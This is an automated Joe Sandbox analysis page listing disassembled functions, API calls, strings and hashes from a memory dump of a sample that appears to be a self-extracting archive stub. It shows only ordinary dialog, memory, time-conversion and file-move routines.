                                • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                • Instruction ID: ea84340925cbfda5f83fcf2874f3ef76a9d02cc8e21e1ec425dcf65d9c2b37e5
                                • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                • Instruction Fuzzy Hash: D6514670600A8757DB38BA688C96BBF67E9DF53740F1C050AE982D7282D715DD4183F6
                                Function 00D6DE6C Relevance: .2, Instructions: 190COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d65a23461cae5fff06dcc849696fd1175a4bcb9e605ce029d233f7147406de8
                                • Instruction ID: 55827935485201de1601623e6c863c2038d2f6e59799cce5b59b0d4990b68021
                                • Opcode Fuzzy Hash: 5d65a23461cae5fff06dcc849696fd1175a4bcb9e605ce029d233f7147406de8
                                • Instruction Fuzzy Hash: D1816B8261A7E49ECB168F7D3CA42B63FA15733340B1D04AAD4C6C63A7C5768A5CD732
                                Function 00D6E8A0 Relevance: .2, Instructions: 154COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd10b8fc9c2f00d492befa88c85af2b4b551af793686b60ebea4a6c9efc4ff98
                                • Instruction ID: f8f6ebeff83f92489f511fd59f549a923aaf2d37bd0de760ca642ae1e870f9d2
                                • Opcode Fuzzy Hash: bd10b8fc9c2f00d492befa88c85af2b4b551af793686b60ebea4a6c9efc4ff98
                                • Instruction Fuzzy Hash: 0751BD399093D54FC712CF28918446EBFE1BEDA314F4949AEE4D54B202D2219A4ACBB2
                                Function 00D6F968 Relevance: .1, Instructions: 131COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c1227bc1bff9f3f868f5cc2cc592a9f0ffdd4088815146ff8d75b2722076a08d
                                • Instruction ID: f994ac7a3ee8c088cea3d86e93a97271e4516de0f6fcae3a0ab95eb7f3b5a73e
                                • Opcode Fuzzy Hash: c1227bc1bff9f3f868f5cc2cc592a9f0ffdd4088815146ff8d75b2722076a08d
                                • Instruction Fuzzy Hash: 4C512671A087018BC748CF19E48059AF7E1FF88354F058A2EE899A7740DB34E959CB9A
                                Function 00D737C1 Relevance: .1, Instructions: 112COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                • Instruction ID: ae16ce1cd614ca71722769187c7ade3dcf0d25caa28933dd137fb35797abfe8c
                                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                • Instruction Fuzzy Hash: 4D31D6B26147468FCB14DF28C85126ABBE0FB95300F14892DE4D9D7742D735EA4ACBB2
                                Function 00D65F3C Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f674de958fe111ea427ecd683d52feb57c3047b0d6d51059acc2d6b73229c9f1
                                • Instruction ID: 02df76f528a1aa2d6afbef9a676f342bbc11b593aaf4349d6a992191c5eb7894
                                • Opcode Fuzzy Hash: f674de958fe111ea427ecd683d52feb57c3047b0d6d51059acc2d6b73229c9f1
                                • Instruction Fuzzy Hash: B3218A72A202654BCB48CF2EEC904767751AB8631174A812BFA46CB3D5C535ED65C7B0
                                Function 00D6DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                                Download Yara Rule
                                APIs
                                • _swprintf.LIBCMT ref: 00D6DABE
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                  • Part of subcall function 00D71596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00DA0EE8,00000200,00D6D202,00000000,?,00000050,00DA0EE8), ref: 00D715B3
                                • _strlen.LIBCMT ref: 00D6DADF
                                • SetDlgItemTextW.USER32(?,00D9E154,?), ref: 00D6DB3F
                                • GetWindowRect.USER32(?,?), ref: 00D6DB79
                                • GetClientRect.USER32(?,?), ref: 00D6DB85
                                • GetWindowLongW.USER32(?,000000F0), ref: 00D6DC25
                                • GetWindowRect.USER32(?,?), ref: 00D6DC52
                                • SetWindowTextW.USER32(?,?), ref: 00D6DC95
                                • GetSystemMetrics.USER32(00000008), ref: 00D6DC9D
                                • GetWindow.USER32(?,00000005), ref: 00D6DCA8
                                • GetWindowRect.USER32(00000000,?), ref: 00D6DCD5
                                • GetWindow.USER32(00000000,00000002), ref: 00D6DD47
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                • String ID: $%s:$CAPTION$d
                                • API String ID: 2407758923-2512411981
                                • Opcode ID: 8b21302bb02159ccbd6612d4bd2af0c9393a97de68dbff7ece549c10171c793a
                                • Instruction ID: 4721548384b083f58e088efcb7e420ab923a94d7c7a0a825584c6b57501b261a
                                • Opcode Fuzzy Hash: 8b21302bb02159ccbd6612d4bd2af0c9393a97de68dbff7ece549c10171c793a
                                • Instruction Fuzzy Hash: 9C819171608306AFD710DF68DD85F6BBBE9EB88704F09091DFA85D7250D670E909CB62
                                Function 00D8C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 00D8C277
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE2F
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE41
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE53
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE65
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE77
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE89
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE9B
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEAD
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEBF
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BED1
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEE3
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEF5
                                  • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BF07
                                • _free.LIBCMT ref: 00D8C26C
                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D8C28E
                                • _free.LIBCMT ref: 00D8C2A3
                                • _free.LIBCMT ref: 00D8C2AE
                                • _free.LIBCMT ref: 00D8C2D0
                                • _free.LIBCMT ref: 00D8C2E3
                                • _free.LIBCMT ref: 00D8C2F1
                                • _free.LIBCMT ref: 00D8C2FC
                                • _free.LIBCMT ref: 00D8C334
                                • _free.LIBCMT ref: 00D8C33B
                                • _free.LIBCMT ref: 00D8C358
                                • _free.LIBCMT ref: 00D8C370
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: d7769372de81343d0aa6d0594aa901b1b8a197f5eca0ffbc385a8e915c8053f7
                                • Instruction ID: 8a317ce0cc343ebf8d4d210481e155aa35474386f48f57fb16c1bf3e9d4bf8ce
                                • Opcode Fuzzy Hash: d7769372de81343d0aa6d0594aa901b1b8a197f5eca0ffbc385a8e915c8053f7
                                • Instruction Fuzzy Hash: FA315832600605DFEB21BB78D945B5A73EAFF00310F58942AF449D7691DF31AC81AB74
                                Function 00D7CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindow.USER32(?,00000005), ref: 00D7CD51
                                • GetClassNameW.USER32(00000000,?,00000800), ref: 00D7CD7D
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00D7CD99
                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D7CDB0
                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7CDC4
                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D7CDED
                                • DeleteObject.GDI32(00000000), ref: 00D7CDF4
                                • GetWindow.USER32(00000000,00000002), ref: 00D7CDFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                • String ID: STATIC
                                • API String ID: 3820355801-1882779555
                                • Opcode ID: a38013cb2fee21c0e9bcb3944225ec091f54e87a0246c263211a8debb075d868
                                • Instruction ID: d6edc0a78f94bc6264680fa63eeeecf9e42ba56e179b1774dc59632013e35e78
                                • Opcode Fuzzy Hash: a38013cb2fee21c0e9bcb3944225ec091f54e87a0246c263211a8debb075d868
                                • Instruction Fuzzy Hash: A6113633140712BFE3306B609C0AFAF765CFF44751F04D025FA4AE1192FA60890696B0
                                Function 00D88EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00D88EC5
                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D88ED1
                                • _free.LIBCMT ref: 00D88EDC
                                • _free.LIBCMT ref: 00D88EE7
                                • _free.LIBCMT ref: 00D88EF2
                                • _free.LIBCMT ref: 00D88EFD
                                • _free.LIBCMT ref: 00D88F08
                                • _free.LIBCMT ref: 00D88F13
                                • _free.LIBCMT ref: 00D88F1E
                                • _free.LIBCMT ref: 00D88F2C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 621770fe92def757de736928e3ccf7dc3ff962ebf6ef0c952ccd80a903dfc15f
                                • Instruction ID: 44000b89cc464163c70a96124b1fa69b8e113c87f7f6097de90fe9f35e21d619
                                • Opcode Fuzzy Hash: 621770fe92def757de736928e3ccf7dc3ff962ebf6ef0c952ccd80a903dfc15f
                                • Instruction Fuzzy Hash: 8811867651010DBFCB11FF58D942CDA3BA6FF04350B9141A5FA088F666DA32EE51EBA0
                                Function 00D62162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: ;%u$x%u$xc%u
                                • API String ID: 0-2277559157
                                • Opcode ID: 9992cd8c686fb07358685a2b304910dac06918e1eb43cc5294da772fc3d5303d
                                • Instruction ID: c13431a16a2f0fdef1ae0c21e5bc226a113a6a67995432dc6a42de18e928751b
                                • Opcode Fuzzy Hash: 9992cd8c686fb07358685a2b304910dac06918e1eb43cc5294da772fc3d5303d
                                • Instruction Fuzzy Hash: 02F125716087805BDB25EF78C895BFE7799AF94300F0C4469F886CB293DB249948C7B6
                                Function 00D7ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • EndDialog.USER32(?,00000001), ref: 00D7AD20
                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D7AD47
                                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D7AD60
                                • SetWindowTextW.USER32(?,?), ref: 00D7AD71
                                • GetDlgItem.USER32(?,00000065), ref: 00D7AD7A
                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D7AD8E
                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D7ADA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: MessageSend$Item$TextWindow$Dialog
                                • String ID: LICENSEDLG
                                • API String ID: 3214253823-2177901306
                                • Opcode ID: 2d4e35d637f849439215cbb3adc8abba8cb2f6c027477652a47dac3005a02dfa
                                • Instruction ID: 12b61c3378df4f9961a679d4c158f9cb0c5c93a7478961a39c82a3bdc1bf2ac3
                                • Opcode Fuzzy Hash: 2d4e35d637f849439215cbb3adc8abba8cb2f6c027477652a47dac3005a02dfa
                                • Instruction Fuzzy Hash: 7921D632244306BBD2315F69EC49E7F3F6CFB8AB46F054015F609D26A0FB519901E632
                                Function 00D69443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D69448
                                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D6946B
                                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D6948A
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                • _swprintf.LIBCMT ref: 00D69526
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • MoveFileW.KERNEL32(?,?), ref: 00D69595
                                • MoveFileW.KERNEL32(?,?), ref: 00D695D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                • String ID: rtmp%d
                                • API String ID: 2111052971-3303766350
                                • Opcode ID: f34aab2d915b1eabfe590eee463f085bb9a0e43db0955372fd835c388de8e0ba
                                • Instruction ID: b95f8ef078a0d0eb75ac830d36de25307219049d4bc8303f19dc7405de3a5c3c
                                • Opcode Fuzzy Hash: f34aab2d915b1eabfe590eee463f085bb9a0e43db0955372fd835c388de8e0ba
                                • Instruction Fuzzy Hash: 23413A71900258A7CF20EBA4CD95AEEB77CEF15380F0444E6B549E3142EB749B89CA74
                                Function 00D70A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                Download Yara Rule
                                APIs
                                • __aulldiv.LIBCMT ref: 00D70A9D
                                  • Part of subcall function 00D6ACF5: GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D70AC0
                                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D70AD2
                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D70AE3
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70AF3
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70B03
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D70B3D
                                • __aullrem.LIBCMT ref: 00D70BCB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                • String ID:
                                • API String ID: 1247370737-0
                                • Opcode ID: e542c2159fb6719d17ba4cf4adf29d78fc1477b8305a64b12469db995ddd6e0b
                                • Instruction ID: 808e661694c1ff96392cbce8496cd9c98403f782882dafc32671e27e3ae14dc8
                                • Opcode Fuzzy Hash: e542c2159fb6719d17ba4cf4adf29d78fc1477b8305a64b12469db995ddd6e0b
                                • Instruction Fuzzy Hash: 8B4119B5408306DFC710DF65C88496BFBF8FB88714F048A2EF59692650E735E649CB61
                                Function 00D8EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00D8F5A2,?,00000000,?,00000000,00000000), ref: 00D8EE6F
                                • __fassign.LIBCMT ref: 00D8EEEA
                                • __fassign.LIBCMT ref: 00D8EF05
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00D8EF2B
                                • WriteFile.KERNEL32(?,?,00000000,00D8F5A2,00000000,?,?,?,?,?,?,?,?,?,00D8F5A2,?), ref: 00D8EF4A
                                • WriteFile.KERNEL32(?,?,00000001,00D8F5A2,00000000,?,?,?,?,?,?,?,?,?,00D8F5A2,?), ref: 00D8EF83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
